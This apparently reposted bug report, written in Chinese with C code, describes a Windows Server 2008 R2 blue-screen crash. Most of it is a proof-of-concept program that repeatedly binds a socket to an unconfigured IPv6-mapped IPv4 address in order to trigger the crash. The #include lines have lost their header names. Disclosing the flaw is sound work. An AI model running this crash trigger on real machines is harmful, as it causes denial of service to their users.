我们发现在特定的环境下运行我们的程序会导致Windows系统蓝屏。通过深入的研究我们将崩溃场景缩减为50行左右的C代码，并且使用了Winsock2 APIs.这个例子反复监听IPV6映射到的无效IPV4地址。Windows Server2008 R2在运行这个例子之后的几秒就崩溃了。这个问题不仅仅出现在物理机上，虚拟机中也同样出现。

// the program attempts to bind to IPV6-mapped IPV4 address
// in a tight loop. If the address is not configured on the machine
// running the program crashes Windows Server 2008 R2 (if program is 32-bit)

#include
#include
#include
#include 

#define IPV6_V6ONLY 27

void MyWsaStartup()
{
WORD wVersionRequested;
WSADATA wsaData;
int err;

wVersionRequested = MAKEWORD(2, 2);

err = WSAStartup(wVersionRequested, &wsaData);
if (err != 0) {
printf("WSAStartup failed with error: %d\n", err);
exit(-1);
}
}

void main()
{
MyWsaStartup();
bool bindSuccess = false;

while(!bindSuccess)
{
SOCKET sock = WSASocket(AF_INET6,
SOCK_DGRAM,
IPPROTO_UDP,
NULL,
0,
WSA_FLAG_OVERLAPPED);
if(sock == INVALID_SOCKET)
{
printf("WSASocket failed\n");
exit(-1);
}

DWORD val = 0;
if (setsockopt(sock,
IPPROTO_IPV6,
IPV6_V6ONLY,
(const char*)&val,
sizeof(val)) != 0)
{
printf("setsockopt failed\n");
closesocket(sock);
exit(-1);
}

sockaddr_in6 sockAddr;
memset(&sockAddr, 0, sizeof(sockAddr));
sockAddr.sin6_family = AF_INET6;
sockAddr.sin6_port = htons(5060);

// set address to IPV6-mapped 169.13.13.13 (not configured on the local machine)
// that is [::FFFF:169.13.13.13]
sockAddr.sin6_addr.u.Byte[15] = 13;
sockAddr.sin6_addr.u.Byte[14] = 13;
sockAddr.sin6_addr.u.Byte[13] = 13;
sockAddr.sin6_addr.u.Byte[12] = 169;
sockAddr.sin6_addr.u.Byte[11] = 0xFF;
sockAddr.sin6_addr.u.Byte[10] = 0xFF;

int size = 28; // 28 is sizeof(sockaddr_in6)

int nRet = bind(sock, (sockaddr*)&sockAddr, size);
if(nRet == SOCKET_ERROR)
{
closesocket(sock);
Sleep(100);
}
else
{
bindSuccess = true;
printf("bind succeeded\n");
closesocket(sock);
}
}
}

via:http://security-sh3ll.blogspot.com/